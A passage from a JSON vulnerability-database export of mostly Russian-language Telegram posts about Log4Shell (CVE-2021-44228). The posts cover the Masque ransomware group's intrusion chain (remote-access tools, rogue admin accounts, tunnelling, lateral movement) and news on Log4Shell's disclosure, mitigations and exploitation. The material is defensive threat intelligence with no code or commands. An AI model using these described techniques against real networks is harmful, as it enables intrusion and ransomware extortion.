\u043d\u043e\u0432\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Masque.\n\nMasque \u2013 \u0440\u0443\u0441\u0441\u043a\u043e\u0433\u043e\u0432\u043e\u0440\u044f\u0449\u0430\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0430\u044f \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 \u0431\u0438\u0437\u043d\u0435\u0441 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 LockBit 3 (Black) \u0438 Babuk (ESXi). \n\n\u0421\u0443\u043c\u043c\u0430 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043a\u0443\u043f\u0430 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5-10 \u043c\u043b\u043d. \u0440\u0443\u0431\u043b\u0435\u0439 (\u0432 BTC \u0438\u043b\u0438 XMR).\n\n\u0421\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0430 Masque \u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u00a0\u044f\u043d\u0432\u0430\u0440\u044f 2024 \u0433\u043e\u0434\u0430, \u0441\u00a0\u043c\u0430\u044f \u043f\u043e\u00a0\u043e\u043a\u0442\u044f\u0431\u0440\u044c 2024 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0442\u043d\u043e\u0435 \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u0435 \u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0432\u00a0\u043d\u043e\u044f\u0431\u0440\u0435-\u0434\u0435\u043a\u0430\u0431\u0440\u0435 2024 \u0433\u043e\u0434\u0430 \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0430\u0442\u0430\u043a \u043d\u0430\u00a0\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u0412 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043b\u0443\u0447\u0430\u0435\u0432 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 Masque \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a VMware Horizon, \u0447\u0435\u0440\u0435\u0437 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 (log4shell).\n\n\u041f\u043e\u0441\u043b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043b\u0430\u0446\u0434\u0430\u0440\u043c\u0430 \u0434\u043b\u044f\u00a0\u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0430\u0442\u0430\u043a\u0438.\n\n\u041f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a AnyDesk, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0441\u00a0\u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b certutil.\n\n\u0414\u043b\u044f \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438, \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u044f \u0438\u0445 \u0432\u00a0\u0433\u0440\u0443\u043f\u043f\u0443 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043e\u043d\u0438 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u00a0\u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0438\u0445 \u0432\u00a0\u0433\u0440\u0443\u043f\u043f\u0443 Enterprise Admins, \u0447\u0442\u043e\u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0438\u0445 \u043f\u0440\u0438\u00a0\u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0438 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u0430.\n\n\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435, \u043a\u0430\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e, \u0446\u0435\u043b\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e \u043d\u0435 \u0442\u0440\u0430\u0442\u044f\u0442 \u0432\u0440\u0435\u043c\u044f \u043d\u0430\u00a0\u043e\u0431\u0445\u043e\u0434 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u00a0\u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439.\n\n\u0421\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u044e\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u043e\u0433\u0434\u0430, \u043a\u043e\u0433\u0434\u0430 \u043e\u043d\u0438 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0438\u043b\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043b\u0438\u0431\u043e \u043f\u043e\u0441\u043b\u0435 \u0438\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438\u00a0\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438.\n\nMasque \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u0442 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u0442\u0443\u043d\u043d\u0435\u043b\u0438 \u0434\u043b\u044f\u00a0\u0441\u0432\u044f\u0437\u0438 \u0441\u00a0\u04212 \u0441\u00a0\u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a chisel \u0438\u00a0LocaltoNet \u0434\u043b\u044f\u00a0\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a\u00a0\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 RDP \u0438\u00a0SSH. \u0412 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 WinRM, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 SMBExec \u0438\u0437 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Impacket.\n\n\u0413\u0440\u0443\u043f\u043f\u0430 Masque \u043d\u0435 \u0443\u0434\u0435\u043b\u044f\u0435\u0442 \u0434\u043e\u043b\u0436\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0433\u043b\u0443\u0431\u043e\u043a\u043e\u043c\u0443 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0436\u0435\u0440\u0442\u0432\u044b \u0438\u00a0\u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u044d\u0442\u043e\u0433\u043e \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u0435 \u043a\u043e\u043f\u0438\u0438 \u0447\u0430\u0441\u0442\u043e \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c\u0438, \u0430\u00a0\u0434\u0430\u043d\u043d\u044b\u0435 \u043d\u0430\u00a0\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u043d\u0435 \u0448\u0438\u0444\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u043e\u0432\u0441\u0435.\n\n\u0414\u043b\u044f \u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u00a0Tox, \u0434\u043b\u044f\u00a0\u043a\u0430\u0436\u0434\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0439 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u0433\u0440\u0443\u043f\u043f\u0430  \u043d\u0435 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0438\u0437\u043e\u0449\u0440\u0435\u043d\u043d\u044b\u0445 \u0438 \u0438\u043d\u043d\u043e\u0432\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0443 \u0438\u043c\u0435\u0432\u0448\u0435\u0439 \u0434\u043e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u043e\u0440\u044b \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0441\u043a\u0443\u0434\u043d\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b Masque, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u0441\u0435 \u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u0443\u044e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 MystiqueLoader.\n\n\u0412\u0441\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438, \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 TTPs \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 F.A.C.C.T.", "creation_timestamp": "2024-12-23T13:40:05.000000Z"}, {"uuid": "d5676ebc-45db-4822-a43a-d2ff1a6a0a80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/wWkAvJnCyCCQ1_aup7Z3dPWw1Kc5yCEt5z9CQmFvXAuGoQ", "content": "", "creation_timestamp": "2021-12-18T18:42:55.000000Z"}, {"uuid": "31e76aaf-394d-40bb-ab70-f2f46a0e47b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/true_secator/2428", "content": "Merry Christmas!!!\n\n\u0412 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 log4j \u043f\u043e\u0434 Apache \u043d\u043e\u0447\u044c\u044e \u0432\u0434\u0440\u0443\u0433 \u043d\u0430\u0448\u043b\u0430\u0441\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE). \u041a \u044d\u0442\u043e\u043c\u0443 \u0432\u0441\u0435\u043c\u0443 \u0443\u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0439 PoC, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 GitHub.\n\n\u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC \u0443 \u0434\u044b\u0440\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u043e \u0434\u0430\u0436\u0435 CVE (\u0441\u0435\u0439\u0447\u0430\u0441 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c - CVE-2021-44228). \u0418\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043a\u0443\u0447\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 - Steam, iCloud \u0438 \u043f\u0440.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Apache log4j \u0432\u043f\u043b\u043e\u0442\u044c \u0434\u043e 2.14.1. \u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0443\u0436\u0435 \u0438\u0434\u0435\u0442 (\u0441\u0442\u0440\u0430\u043d\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u0436\u0438\u0434\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e PoC).\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043c\u0435\u0440\u044b \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044f \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c log4j \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0-rc1, \u043d\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0447\u0430\u0441\u043e\u0432 \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u0431\u0445\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0435\u043f\u0435\u0440\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0434\u043e 2.15.0-rc2. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c log4j2.formatMsgNoLookups \u0432 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 true.\n\n\u0422\u0430\u043a\u0436\u0435 LunaSec \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043a\u0438\u0442\u0430\u0439\u0446\u0435\u0432 \u0433\u043e\u0432\u043e\u0440\u044f\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 JDK \u0432\u044b\u0448\u0435 6u211, 7u201, 8u191 \u0438 11.0.1.\n\n\u041d\u0443 \u0430 \u0432\u0438\u0448\u0435\u043d\u043a\u0430 \u043d\u0430 \u044d\u0442\u043e\u043c \u0440\u043e\u0436\u0434\u0435\u0441\u0442\u0432\u0435\u043d\u0441\u043a\u043e\u043c \u0442\u043e\u0440\u0442\u0435 - \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Minecraft \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 1.8.8. \n\nApache Foundation \u043f\u044c\u044e\u0442 \u0432\u0430\u043b\u0435\u0440\u044c\u044f\u043d\u043a\u0443 \u0438 \u043c\u043e\u043b\u0447\u0430\u0442.\n\nMerry Christmas, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-10T10:16:35.000000Z"}, {"uuid": "aa58476d-bbf9-4a53-81cb-62567915530a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/true_secator/2450", "content": "\u200b\u200b\u0412\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f Log4Shell \u043a\u0438\u0431\u0435\u0440\u043f\u0430\u043d\u0434\u0435\u043c\u0438\u044f \u0432 \u0441\u0444\u0435\u0440\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u043e\u0440\u043e\u0442\u044b.\n \n\u041d\u0430\u0440\u044f\u0434\u0443 \u0441 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0431\u043e\u043b\u0435\u0435 1,8 \u043c\u043b\u043d. \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 \u0432 Log4j, \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u0442\u043e\u0440\u0443\u044e \u0438 \u0442\u0440\u0435\u0442\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n \n\u042d\u0442\u043e \u0432\u0441\u0435 \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 60 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0431\u0430\u0433\u0443 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432 malware, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0432\u0435\u0441\u044c \u0441\u043f\u0435\u043a\u0442\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439 \u043e\u0442 \u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0442\u0440\u043e\u044f\u043d\u043e\u0432 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0434\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u0438 \u0432\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u0435\u043a. \u0418, \u0447\u0442\u043e \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c MSTIC, \u0431\u0440\u043e\u043a\u0435\u0440\u044b \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0434\u043b\u044f \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0435 \u0441\u0435\u0442\u0438, \u043b\u0430\u0437\u0435\u0439\u043a\u0438 \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u0431\u044b\u043b\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f\u043c.\n \n\u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c (Hafnium), \u0418\u0440\u0430\u043d\u043e\u043c (APT 35 aka Phosphorus), \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0439 \u0438 \u0422\u0443\u0440\u0446\u0438\u0435\u0439, \u0432 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432 